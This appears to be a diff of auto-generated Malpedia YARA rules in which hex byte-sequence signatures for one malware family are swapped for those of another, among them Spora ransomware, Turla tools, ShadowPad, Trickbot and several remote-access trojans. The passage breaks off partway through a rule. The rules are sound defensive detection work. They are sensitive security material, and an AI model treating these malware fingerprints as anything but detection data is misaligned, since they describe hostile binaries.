MALPEDIA_Win_Spora_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a3a 8d4641 668945f0 58 ff7510 668945f2 ff750c } - $sequence_1 = { f6c301 742c 6a3a 8d4641 668945f0 58 ff7510 } - $sequence_2 = { 897df4 85ff 747a 834d08ff } - $sequence_3 = { 834d08ff 8d45f8 50 57 8d4508 50 } - $sequence_4 = { 8d4641 668945f0 58 ff7510 668945f2 ff750c 33c0 } - $sequence_5 = { 33c0 668945f4 8d45f0 50 ff15???????? 50 8d45f0 } - $sequence_6 = { 0fb600 48 50 ff36 ff15???????? 85c0 } - $sequence_7 = { c745c800040000 33f6 8d45c4 50 ff15???????? 85c0 750e } - $sequence_8 = { 50 ff15???????? 85c0 7466 56 57 bf00020000 } - $sequence_9 = { 0bf0 57 ff15???????? 5f 8bc6 } + $sequence_0 = { 8d85b4feffff 50 ff75f8 ff15???????? 8b85b4feffff } + $sequence_1 = { 8b35???????? 57 33ff 3bc7 7416 57 50 } + $sequence_2 = { 8b45fc 83c424 8d44301a 6a1c 6a40 894508 ff15???????? } + $sequence_3 = { 890d???????? ebdb 89848a00c0e7ff a1???????? ff05???????? } + $sequence_4 = { e8???????? ff36 e8???????? 83c00c 68444e4549 } + $sequence_5 = { 8d856cffffff c7856cffffff94000000 50 ff15???????? 6a05 } + $sequence_6 = { c20800 55 8bec 81ec98000000 56 57 } + $sequence_7 = { 899d30ffffff 66895df0 f3ab 8d7df2 6a0f } + $sequence_8 = { 83c00c 0107 8b37 03f3 e8???????? 6854414449 } + $sequence_9 = { 57 c7460404100680 897e0c 894614 ff75f8 53 ff15???????? } condition: - 7 of them and filesize <73728 + 7 of them and filesize <118784 } -rule MALPEDIA_Win_Tabmsgsql_Auto : FILE +rule MALPEDIA_Win_Cruloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "95969567-7681-52bb-9f9f-efce304f47a8" + id = "975bd752-b718-50f1-9af8-cfa41728edc9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tabmsgsql_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cruloader_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "7b59d9e77530877005ccccefb5d251d16423422a57046d3f1c0987aa86d57fc9" + logic_hash = "a1572c6250fefbf1b80a173c44c61e578e12fe07ff0f92d960b828b4e32b23d4" score = 75 quality = 75 tags = "FILE" @@ -152678,32 +155490,32 @@ rule MALPEDIA_Win_Tabmsgsql_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c0 f2ae f7d1 2bf9 8bd1 8bf7 8bbc24a4010000 } - $sequence_1 = { 8a443901 c0fb02 8a80c8244100 c0e004 02c3 880416 } - $sequence_2 = { 8882c8254100 48 42 83f841 } - $sequence_3 = { 8bf8 75ce 8b6c2414 8b542418 b8ad8bdb68 } - $sequence_4 = { 6804010000 8b842478030000 52 c744242844000000 c744245401010000 8b08 8b400c } - $sequence_5 = { f2ae f7d1 49 8d85c8f7ffff } - $sequence_6 = { 0f8eb2000000 8b7c2414 0fbe05???????? 33db 8a1c39 3bd8 } - $sequence_7 = { ff15???????? b940000000 33c0 bf???????? 68???????? f3ab 68???????? } - $sequence_8 = { a1???????? 50 ff15???????? b940000000 33c0 bf???????? } - $sequence_9 = { 33c0 8a443901 c0fb02 8a80c8244100 c0e004 02c3 880416 } + $sequence_0 = { 53 ff15???????? 6a04 6800100000 ff35???????? 6a00 } + $sequence_1 = { 6bf638 8b0c8dd85e4100 80643128fd 5f 5e c9 c3 } + $sequence_2 = { 0f1005???????? 50 0f1145e0 ff15???????? 33c9 90 8a540dd0 } + $sequence_3 = { 3bf7 72e9 5f f7d0 5e 8be5 } + $sequence_4 = { 88540dc0 41 3bc8 7ced } + $sequence_5 = { 83c404 0f1000 6a00 0f1185ccfbffff ff15???????? } + $sequence_6 = { 833d????????00 0f851c0e0000 8d0db02f4100 ba1b000000 e9???????? a900000080 7517 } + $sequence_7 = { 7309 80341961 41 3bca 72f7 e8???????? 8d45ec } + $sequence_8 = { 0f8c5cffffff c705????????01000000 8b7d08 83c8ff } + $sequence_9 = { 0f8494010000 8bb5e4fcffff 8d45f4 50 ff7354 57 ff75e8 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Newcore_Rat_Auto : FILE +rule MALPEDIA_Win_Turla_Rpc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "665a19c1-0b9c-5837-8284-a9e9fed7fabd" + id = "d062a0c9-c6c6-5f57-a60f-6c6b55d2f616" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newcore_rat_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turla_rpc_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "bc0ab135cc137a5ffe441affd5712e460cc93f003c5dd205f806c56bc27b56a3" + logic_hash = "696b632d482c9df6571dae61d7a8f9238e184ca30e0aa7fbb216cfbf4128270e" score = 75 quality = 75 tags = "FILE" @@ -152717,32 +155529,38 @@ rule MALPEDIA_Win_Newcore_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b08 8b11 50 8b4204 ffd0 8d4c2414 e8???????? } - $sequence_1 = { 898670300000 e8???????? 5f 5d b801000000 } - $sequence_2 = { 51 8d4c243c e8???????? 8d4c2414 e8???????? 8b542448 52 } - $sequence_3 = { 50 8d4c245e 51 6689442460 e8???????? 83c40c 6a30 } - $sequence_4 = { 6a00 6a00 8d542478 52 6a00 ff15???????? 85c0 } - $sequence_5 = { 8b442450 e9???????? 6830020000 8d442458 6a00 50 } - $sequence_6 = { 8b8610100000 85c0 740d 50 ffd7 c7861010000000000000 } - $sequence_7 = { 5b c21000 8d9344020000 68???????? 52 e8???????? 8bf0 } - $sequence_8 = { 83c40c 03f9 014c2414 eb04 8b5c240c 014c242c b81f85eb51 } - $sequence_9 = { 68???????? 8d9424ac060000 e8???????? 83c408 53 8d8c24a8060000 } + $sequence_0 = { c645bc55 c7854001000030163930 c78544010000343b2025 c6854801000055 c78560010000013c3830 c785640100003a202155 } + $sequence_1 = { c744244806393030 66c744244c2555 c785c000000006302110 c785c400000027273a27 c785c8000000183a3130 c685cc00000055 } + $sequence_2 = { c7456016273034 c745642130133c c7456839300255 c7851001000016273034 c7851401000021300527 c785180100003a363026 } + $sequence_3 = { c745b06970746f c745b472536163 66c745b86c00 ff15???????? } + $sequence_4 = { c7850401000030102d36 c785080100003025213c 66c7850c0100003a3b c6850e01000055 c745c007303431 } + $sequence_5 = { 488bd8 ffd3 488d4d70 488bf8 ffd3 } + $sequence_6 = { c6458e55 c744245033273034 66c74424543155 c744243033273030 c644243455 c744244033263030 66c74424443e55 } + $sequence_7 = { c6852e01000055 c745b0193a3431 c745b4193c3727 c745b834272c14 c645bc55 c7854001000030163930 c78544010000343b2025 } + $sequence_8 = { c7851401000021300527 c785180100003a363026 66c7851c0100002602 c6851e01000055 } + $sequence_9 = { c7854cffffff00000000 c78548ffffff00000000 c78554ffffff00000000 c78550ffffff00000000 c745bc53003a00 c745c028004d00 c745c44c003b00 } + $sequence_10 = { 56 ffd3 8987d8000000 8d87dc000000 } + $sequence_11 = { 68???????? ff15???????? 8b4dfc 33c0 5f 5e } + $sequence_12 = { 8bf8 85ff 7514 8d45ac 50 ff15???????? } + $sequence_13 = { 57 ff15???????? 8b85b8fdffff ffb5bcfdffff a3???????? } + $sequence_14 = { 68???????? e8???????? 6a03 68???????? 8d0c45ac880110 8bc1 } + $sequence_15 = { 8d45c8 50 ffd6 8bf8 8d8558ffffff } condition: - 7 of them and filesize <581632 + 7 of them and filesize <311296 } -rule MALPEDIA_Win_New_Ct_Auto : FILE +rule MALPEDIA_Win_Tiny_Turla_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d2add3a1-140a-5bb8-b61a-9a3c6a02e7fc" + id = "03ecfc31-50be-55ad-b8ea-3661b97e212f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.new_ct_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tiny_turla_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "d5abc4cf0e59662bf031f834b2da1a42e3067fae0164acdda49916fdb832ef21" + logic_hash = "78e001a1d7d03185ba347a5f9852159024940a515be46a1732bb8c9313d9ab24" score = 75 quality = 75 tags = "FILE" @@ -152756,32 +155574,32 @@ rule MALPEDIA_Win_New_Ct_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894304 7532 8bfe 83c9ff 33c0 f2ae f7d1 } - $sequence_1 = { 7472 3c42 746e 33c0 } - $sequence_2 = { 81ec00040000 53 56 6888030000 33db } - $sequence_3 = { 7605 b800000100 8b742418 03c7 8d8c24bc070000 8d44301c } - $sequence_4 = { c644240537 c644240679 c6442407b9 7627 } - $sequence_5 = { 8bcd 8933 2bce c6043e00 49 33c0 } - $sequence_6 = { 50 6a00 6a00 68???????? 6a00 68???????? ff15???????? } - $sequence_7 = { 33c0 8dbc24bd070000 c68424bc07000000 c68424bc0f000000 f3ab 66ab aa } - $sequence_8 = { 740d 8d942414020000 52 ffd0 83c404 5f 5e } - $sequence_9 = { 8bbc245c040000 c1e902 f3a5 8bc8 83e103 f3a4 } + $sequence_0 = { 4533ed 8b7d7f 488b742450 8d4f02 } + $sequence_1 = { 0f84f8000000 33d2 488d4da0 448d4268 } + $sequence_2 = { 488b16 8bd8 894567 41b906000200 488d4577 4533c0 } + $sequence_3 = { 48895c2420 ff15???????? 85c0 750e 488bce } + $sequence_4 = { ff15???????? 85c0 7516 4533ed } + $sequence_5 = { 440fb62a 44886d6f 44894d7f 4585c0 7540 } + $sequence_6 = { ff15???????? b005 e9???????? 8b0f 85c9 } + $sequence_7 = { 418d511b ff15???????? 488bcb 85c0 0f849b000000 8b7d50 } + $sequence_8 = { 48c74308ffffffff 488b4b18 4883f9ff 740e ff15???????? } + $sequence_9 = { 4883ec18 c7042400000000 33c0 83f801 7441 8b0424 488b4c2420 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <51200 } -rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE +rule MALPEDIA_Win_Ksl0T_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59484933-96f5-5392-a130-d1897de1bd22" + id = "5a4c8dc6-6c96-5c41-9019-3d4bc785a54b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.trochilus_rat_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ksl0t_auto.yar#L1-L172" license_url = "N/A" - logic_hash = "e651983c70589c057f0ef7e60f3a8876ce52f4e099a0b1c41a830840b75beb3c" + logic_hash = "5f184f0ae6eb14c42a9f8143b74f6a69a5bb90e2ed5eff63faec19a839c8988a" score = 75 quality = 75 tags = "FILE" @@ -152795,32 +155613,38 @@ rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb74636 50 ffd7 0fb7c8 668bd1 662b935e010100 } - $sequence_1 = { 6a32 56 53 e8???????? } - $sequence_2 = { 50 ffd3 668b8e52010100 662bc8 6683f903 0f8c9e000000 81863001010018fcffff } - $sequence_3 = { 56 8bf1 8d5e04 8bcb e8???????? 83f8ff 7407 } - $sequence_4 = { 8d4de4 51 50 ff7538 ff7534 } - $sequence_5 = { 5e 5d c20c00 55 8bec 837d08ff 56 } - $sequence_6 = { 68???????? 50 ff15???????? 85c0 7404 33c0 eb1a } - $sequence_7 = { ff15???????? 33c0 eb81 55 8bec 51 53 } - $sequence_8 = { 33db 391f 7e1d 8b4704 8b4c0304 68a01e0110 e8???????? } - $sequence_9 = { b8fac50010 e8???????? 8bf1 837d0800 7505 8b06 ff505c } + $sequence_0 = { ff15???????? 83c40c 3bf7 7515 ff15???????? } + $sequence_1 = { c68424a100000039 c68424a200000039 888c24a3000000 c684248000000026 } + $sequence_2 = { c684241001000006 88842411010000 889c2412010000 c684241301000013 } + $sequence_3 = { 68???????? 8d8d00080000 51 ff15???????? 8d9500080000 52 } + $sequence_4 = { ff942418040000 4c8bd8 488b842420040000 4c899878010000 488d542468 } + $sequence_5 = { c68424f600000034 c68424f700000038 c68424f800000030 c68424f900000002 c68424fa00000055 c644245813 c64424593c } + $sequence_6 = { c684245a01000021 c684245b01000018 c684245c01000030 c684245d01000026 c684245e01000026 c684245f01000034 } + $sequence_7 = { 4881c294000000 41b801000000 488d0dd7e60000 ff15???????? } + $sequence_8 = { 8d94241c030000 52 53 89466c ffd7 894670 } + $sequence_9 = { 3bcf 7518 81fa00010000 7510 } + $sequence_10 = { c684248800000002 c684248900000055 c684241801000000 c68424190100003b c684241a0100003d c684241b0100003a } + $sequence_11 = { 84c0 745a 68???????? 68???????? ff15???????? 68???????? 68???????? } + $sequence_12 = { 488bce 488905???????? ff15???????? 488bc8 e8???????? 488d1592280000 488bce } + $sequence_13 = { ff15???????? 8bf0 6800020000 57 8d95000d0000 52 ff15???????? } + $sequence_14 = { 7509 488d0de2450000 eb02 33c9 e8???????? 4883c438 c3 } + $sequence_15 = { c68424f801000038 c68424f901000034 c68424fa01000039 c68424fb01000039 c68424fc0100003a } condition: - 7 of them and filesize <630784 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Rad_Auto : FILE +rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7146ba59-d944-5b98-95a4-2cbd8d5bc1ff" + id = "74286b0f-5712-5890-afe4-259cc8765b9b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rad" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rad_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turla_silentmoon_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "ca5f1a440d85092616999ffada86b8990e8f68350339b252577329abb6a444ee" + logic_hash = "f84d11e90ac1422010cde8ffffe4ee94ce33e7fe9731643e241a69ac7f1c820c" score = 75 quality = 75 tags = "FILE" @@ -152834,32 +155658,32 @@ rule MALPEDIA_Win_Rad_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c644242000 e8???????? 8d542420 52 8d8c2498000000 c684240c06000018 ff15???????? } - $sequence_1 = { 8b8680000000 3bc3 741b 8bbe84000000 e8???????? 8b8680000000 } - $sequence_2 = { a1???????? 33c4 89442434 8b4508 8b00 85c0 751a } - $sequence_3 = { 8b84241c010000 50 ffd6 83c404 8b8c2400060000 64890d00000000 } - $sequence_4 = { 8d8d70ffffff ff25???????? 8b8578ffffff 83e002 0f8413000000 83a578fffffffd } - $sequence_5 = { ffd3 8d8c2494000000 c684240806000005 ff15???????? 8b4c2418 51 8d8c2498000000 } - $sequence_6 = { ff15???????? 8d8c2494000000 c684240806000020 ff15???????? b8???????? 8d4c2420 } - $sequence_7 = { e8???????? 8bc7 50 c645fc02 e8???????? 8bc8 } - $sequence_8 = { 720a 8b4c2434 51 ffd6 83c404 8d9424a8000000 52 } - $sequence_9 = { 8d7e04 c645fc29 8d4f04 c706???????? 89bd10fdffff ff15???????? } + $sequence_0 = { 88442453 a1???????? 89442430 a0???????? 53 56 88442444 } + $sequence_1 = { 8b4508 85c0 0f84f9010000 8938 5e 5b 8be5 } + $sequence_2 = { 51 6800001000 53 56 ff15???????? 83f801 } + $sequence_3 = { b950000000 e8???????? 83c404 6a08 b990000000 e8???????? } + $sequence_4 = { 8b94bd28feffff 8d441001 8b55f0 8955d4 8b94bd28feffff 8955d8 8b55f0 } + $sequence_5 = { 3bd1 7c9a 0fb608 3bd1 7e66 83be5c02000008 7c2f } + $sequence_6 = { 48 83f803 0f878a000000 ff248588344000 8bc3 e8???????? } + $sequence_7 = { 85ff 0f8f82fcffff 5f 5b } + $sequence_8 = { 7e0a 8b4df0 8b7dd8 33c0 f3ab 8145d808040000 } + $sequence_9 = { 741f 8b4508 85c0 7406 c700faffffff c787c4130000faffffff 5e } condition: - 7 of them and filesize <207872 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Babylon_Rat_Auto : FILE +rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "520c4cbb-7168-5cad-9ac5-61fcc34e0523" + id = "2e69e70e-5601-5931-bcd7-e645b5b9c52f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babylon_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fuwuqidrama_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "d4eca63a433742f88d4570a738d70afc76a66ddfd0669e9e8d639b4f32143e21" + logic_hash = "8de556fe8f63afd7a879ecce2fdbb1a150474ddb330c86740527423f92305d9c" score = 75 quality = 75 tags = "FILE" @@ -152873,32 +155697,32 @@ rule MALPEDIA_Win_Babylon_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75ec 8908 e8???????? 83c40c 85c0 7407 8b4808 } - $sequence_1 = { ff761c 6a44 57 e8???????? 83c418 eb36 6a00 } - $sequence_2 = { f6c23e 0f84ac000000 8bc3 83e01a 663bc3 740e 8bc3 } - $sequence_3 = { ffb50cffffff ffb5f0feffff e8???????? 8bc8 e8???????? 660f28c8 eb54 } - $sequence_4 = { e8???????? 56 e8???????? 59 50 56 8d8dc8fbffff } - $sequence_5 = { ff15???????? 50 680a190000 e9???????? e8???????? 8945f8 59 } - $sequence_6 = { ff36 0fb6c9 51 ff761c ff7510 ff7508 e8???????? } - $sequence_7 = { c645fc01 85c0 7404 8b10 eb02 8bd3 8b45e8 } - $sequence_8 = { ff7708 6a77 53 e8???????? ff751c 53 e8???????? } - $sequence_9 = { ff7514 ff7510 57 e8???????? 83c40c eb79 53 } + $sequence_0 = { 8b44241c 8db08c000000 8b8314140000 83f802 764a 8d6b1a 85ed } + $sequence_1 = { 8b842490020000 52 50 8d4c2444 68???????? 51 } + $sequence_2 = { 8917 8b542414 894704 b801000000 894f08 89570c 5f } + $sequence_3 = { 57 33ff 8bd9 57 57 8d4c2430 } + $sequence_4 = { 8bdf 036908 c1c305 036c2424 c1c61e 89742418 8b712c } + $sequence_5 = { 83c508 55 ffd7 8a542412 899ec8030000 8896c4030000 899ecc030000 } + $sequence_6 = { 8bdf 036918 c1c305 036c2410 c1c61e 89742428 8d9c2bd6c162ca } + $sequence_7 = { ff5220 8d460c 50 ff15???????? 8b4624 } + $sequence_8 = { 50 ffd6 8d4c242c 6a02 8d542418 51 52 } + $sequence_9 = { 3d10270000 0f87e7020000 8b5708 8b4704 52 50 8bcf } condition: - 7 of them and filesize <1604608 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Rtpos_Auto : FILE +rule MALPEDIA_Win_Karagany_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "77dcd653-95cb-55c4-91a1-f9b9e9596fd3" + id = "edc2e98f-b8d5-5230-8689-3d1d2cb2218e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rtpos_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.karagany_auto.yar#L1-L110" license_url = "N/A" - logic_hash = "4ad89a49b88ba1ea262b015470065dd4f3f20d950975a1f27ea85a4b99624bd0" + logic_hash = "52de418a32cc53d0482440cda283dab56320888d4a5fd4c0281ba321f99401f6" score = 75 quality = 75 tags = "FILE" @@ -152912,32 +155736,32 @@ rule MALPEDIA_Win_Rtpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68a8040000 8b45ec 50 e8???????? 83c408 c3 8b542408 } - $sequence_1 = { 83e908 8d7608 660fd60f 8d7f08 8b048d74b44000 } - $sequence_2 = { 8b0cc5c4ae4200 894de4 85c9 7455 } - $sequence_3 = { 7619 8b4dd4 51 ff15???????? } - $sequence_4 = { 8d45d8 50 6a00 8b4dd4 51 } - $sequence_5 = { 85c0 752c 6a00 68???????? 68???????? 6a02 68???????? } - $sequence_6 = { 8bec 53 8b5d08 33c9 57 33c0 8d3c9d5c654300 } - $sequence_7 = { 33c5 8945fc c745d800000000 c745dc00000000 33c0 } - $sequence_8 = { 2b45c4 3b45f0 7619 8b4dd4 51 ff15???????? } - $sequence_9 = { 6bc030 03048db86a4300 50 ff15???????? 5d c3 } + $sequence_0 = { 8d85a4fdffff 50 ffd6 68???????? } + $sequence_1 = { 894ddc 894de4 894df0 894df8 894dfc } + $sequence_2 = { 57 8bf8 6a03 57 ffd6 } + $sequence_3 = { 57 8bf8 6a03 57 } + $sequence_4 = { 6800300000 6800000300 6a00 ff15???????? } + $sequence_5 = { 8bf8 6a03 57 ffd6 85c0 } + $sequence_6 = { 8b35???????? 57 8bf8 6a03 } + $sequence_7 = { 6a40 6800300000 6800000300 6a00 ff15???????? } + $sequence_8 = { 6a03 53 ffd6 85c0 } + $sequence_9 = { 57 8bf8 6a03 57 ffd6 85c0 } condition: - 7 of them and filesize <507904 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Jlorat_Auto : FILE +rule MALPEDIA_Win_Shadowpad_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eb5a0545-ab37-5e70-b9eb-6c48eb9adb8a" + id = "c7d36336-f736-58f8-9fa1-3e3ab1239351" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jlorat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shadowpad_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "c96d7ee2744d61897b682d97d67d56d29e38731c8c93cf3d00f8d6450ca3d2bf" + logic_hash = "af53d025dfe83e5b7a4ca7b9e68b22a960854fdb5b48b2d1cee2b2ef3fbc15f2" score = 75 quality = 75 tags = "FILE" @@ -152951,34 +155775,34 @@ rule MALPEDIA_Win_Jlorat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83ec10 89c1 83c101 83d200 89542450 31c0 } - $sequence_1 = { f20f114620 c7464001000000 89e0 8d5620 895004 8908 e8???????? } - $sequence_2 = { f20f1086d8020000 f20f108ee0020000 f20f118e28030000 f20f118620030000 f20f108630030000 f20f118648030000 f20f108620030000 } - $sequence_3 = { f6861618000001 0f85c0160000 e9???????? 8b4510 8b08 89e0 894804 } - $sequence_4 = { eb00 e9???????? 8b559c 8b7580 8b7d84 8b5da4 8b4d88 } - $sequence_5 = { e8???????? 8945c8 eb00 8b4dc4 8b45c8 c645e300 8945cc } - $sequence_6 = { c745f0ffffffff 89e0 8d4dd8 8908 e8???????? 8b45c8 8b4de8 } - $sequence_7 = { f30f118424d8000000 eb43 8b4c2448 8b54244c 89e0 895004 8908 } - $sequence_8 = { e8???????? 894644 eb00 8b4e44 c601ff c64101ff c64102ff } - $sequence_9 = { eb09 8b4df4 83c101 894df4 837df40a 7302 ebef } + $sequence_0 = { e8???????? 59 8d75dc a3???????? e8???????? 53 ff15???????? } + $sequence_1 = { 5b c9 c3 55 8bec b8f8100000 e8???????? } + $sequence_2 = { 8bec 53 57 ff7508 ff15???????? 8d7801 } + $sequence_3 = { 8d45e8 50 53 8d75d0 } + $sequence_4 = { 7e25 8a0c56 8a445601 80e961 2c6a } + $sequence_5 = { 50 6a04 5f e8???????? 85c0 75ae 8d4310 } + $sequence_6 = { 83ec24 53 56 57 33ff 393d???????? } + $sequence_7 = { e8???????? 8b1d???????? 50 ffd3 6800010000 668945f0 } + $sequence_8 = { 8bfe 8d45e8 895de8 895dec 895df4 895df0 885df8 } + $sequence_9 = { 0fb639 c1ce08 83cf20 03f7 83c102 81f6a3d9357c 663919 } condition: - 7 of them and filesize <10952704 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE +rule MALPEDIA_Win_Trickbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6157b109-2151-5074-8840-c27487c07a25" + id = "7ca88b89-dbe0-5ca7-acaa-87de79bf1962" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whiteblackcrypt_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.trickbot_auto.yar#L1-L637" license_url = "N/A" - logic_hash = "f60c96c165ea27ee68f018ece2d6f92a309aa90e387cd2c1a16407c43ba45f47" + logic_hash = "e3adabeebcd43d3e3c9deb0d5c4eb46cb018beaf463780980939f5dd81bffcd5" score = 75 - quality = 75 + quality = 48 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -152990,34 +155814,101 @@ rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 790d b910270000 ff15???????? ebea e8???????? b805000030 31c9 } - $sequence_1 = { 75ed 0f118fb0000000 4883c310 ebc4 4883c420 5b 5e } - $sequence_2 = { 4883ec38 83fa02 744c 7707 83fa01 745a eb4d } - $sequence_3 = { 75a2 5b 5e c3 4c8d4a10 48c1e104 } - $sequence_4 = { 488d0d583d0000 c705????????01000000 e8???????? 4885c0 7414 b801000000 } - $sequence_5 = { 4889c6 4889c7 4489f0 f3aa 4889f1 e8???????? } - $sequence_6 = { 4881ecb0030000 4c8d0504420000 31c0 41b9ffff0000 } - $sequence_7 = { 8801 48ffc1 ebe8 c3 55 } - $sequence_8 = { 7412 8d509f 80fa19 7703 } - $sequence_9 = { f20f2ad2 48895c2420 dd442420 f20f11542428 dd442428 d9c9 d9fd } + $sequence_0 = { 83c002 eb0d 2500000080 f7d8 1bc0 83e007 40 } + $sequence_1 = { 1bc0 83e020 83c020 eb36 } + $sequence_2 = { eb36 2500000080 f7d8 1bc0 83e070 83c010 } + $sequence_3 = { f7d8 1bc0 83e002 83c002 eb0d } + $sequence_4 = { 83e070 83c010 eb25 a900000040 7411 2500000080 } + $sequence_5 = { 7429 a900000040 7411 2500000080 f7d8 1bc0 83e020 } + $sequence_6 = { 8b07 a900000020 7429 a900000040 } + $sequence_7 = { c705????????fdffffff c705????????feffffff c705????????ffffffff e8???????? } + $sequence_8 = { 895df4 895dec 66c745f00005 895dfc } + $sequence_9 = { 33ff 57 6880000000 6a02 57 6a01 68000000c0 } + $sequence_10 = { 41 83c028 3bce 7ce9 } + $sequence_11 = { 488b01 4c8b4120 488b5118 488b4910 } + $sequence_12 = { 53 6a03 53 6a01 6800010000 } + $sequence_13 = { 4889442428 488b4130 488b4910 4889442420 41ffd2 } + $sequence_14 = { 488b01 488b5118 488b4910 